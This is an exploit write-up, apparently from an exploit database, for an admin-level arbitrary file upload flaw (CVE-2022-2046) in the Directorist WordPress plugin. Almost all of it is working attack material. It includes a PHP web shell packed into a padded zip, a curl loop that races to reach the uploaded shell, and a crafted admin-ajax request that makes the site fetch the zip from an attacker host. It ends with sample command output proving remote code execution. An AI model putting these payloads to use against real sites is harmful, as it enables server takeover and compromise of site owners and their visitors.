Exploit for Directorist - Business Directory Plugin < 7.2.3 - Admin+ Arbitrary File Upload CVE-2022-2046

## https://sploitus.com/exploit?id=WPEX-ID:03A04EAB-BE47-4195-AF77-0DF2A32EB807
1. Craft a custom zip file
-------bash
echo "<?php echo shell_exec($_REQUEST['c']); ?>" > dummy_shell.php

for i in `seq 1 10000`; do 
    echo $RANDOM | md5sum | head -c 30 > "dummy_$i.txt"
done

zip -qqr "payload.zip" dummy_*
-------bash

2. Create a bash script that will try to hit the shell on a while loop
-------bash
#!/bin/sh

while true; do
    code=$(curl -s -w "%{http_code}" -o result "http://<wp_site>/wp-content/plugins/atbdp-temp-dir/dummy_shell.php?c=id")
    if [ $code -eq 200 ]; then
	echo ""
	echo "RCE sucess"
        cat result
        break
    fi
    echo -n "."
done
-------bash

3. Execute the bash script on step 2 

4. Login as WP admin and send this crafted HTTP request
-------httprequest
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 750
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary221I9lesLluZJPEm
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fsrv%2Fwww%2Fwordpress%2Fwp-content%2Fuploads%2F2022%2F05%2Flistings-export-data.txt&delimiter=%2C
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [Replace with Admin+ cookie]
Connection: close

------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="action"

atbdp_download_file
------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="download_item[download_link]"

https://<attacker_site>/payload.zip
------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="download_item[skip_licencing]"

true
------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="download_item[permalink]"

true
------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="nonce"

< as admin, go to http://<wp_domain>/wp-admin/edit.php?post_type=at_biz_dir and search string 'atbdp_admin_data = {"nonce":' and get the nonce value after the searched string>
------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="type"

plugin
------WebKitFormBoundary221I9lesLluZJPEm--

-------httprequest

5. We will see the output from the bash script that we executed earlier will output the "id" command result from the targeted WP site . Example :
..................................................................
RCE sucess
uid=33(www-data) gid=33(www-data) groups=33(www-data)